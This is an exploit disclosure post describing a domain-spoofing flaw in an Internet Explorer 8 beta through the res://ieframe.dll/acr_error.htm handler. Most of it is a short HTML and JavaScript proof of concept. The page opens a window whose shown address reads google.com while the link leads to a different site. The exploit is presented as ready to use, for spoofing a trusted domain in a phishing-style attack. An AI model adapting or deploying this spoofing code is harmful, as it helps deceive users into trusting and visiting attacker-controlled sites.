IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff

###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
vendor notify:yes exploit available:yes
############################################


Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)

#################
Proof of concept
#################

Code:


<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://abc.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>

<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>

</html>


#######################################